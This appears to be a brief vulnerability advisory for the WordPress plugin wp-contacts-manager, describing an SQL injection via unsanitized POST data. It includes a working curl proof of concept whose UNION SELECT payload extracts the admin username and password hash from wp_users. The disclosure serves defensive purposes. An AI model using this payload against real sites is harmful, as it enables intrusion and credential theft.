The plugin fails to properly sanitize user supplied POST data before it is being interpolated in an SQL statement and then executed, leading to an SQL injection vulnerability.
curl ‘http://127.0.0.1:8080/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type;=get-contact’ \ --data ‘{“id”:"1\u0027 UNION ALL SELECT 1,(SELECT user_login FROM wp_users WHERE ID = 1),(SELECT user_pass FROM wp_users WHERE ID = 1),4,5,6,7,8,9,0,1,2; – "}’
CPE | Name | Operator | Version |
---|---|---|---|
wp-contacts-manager | eq | * |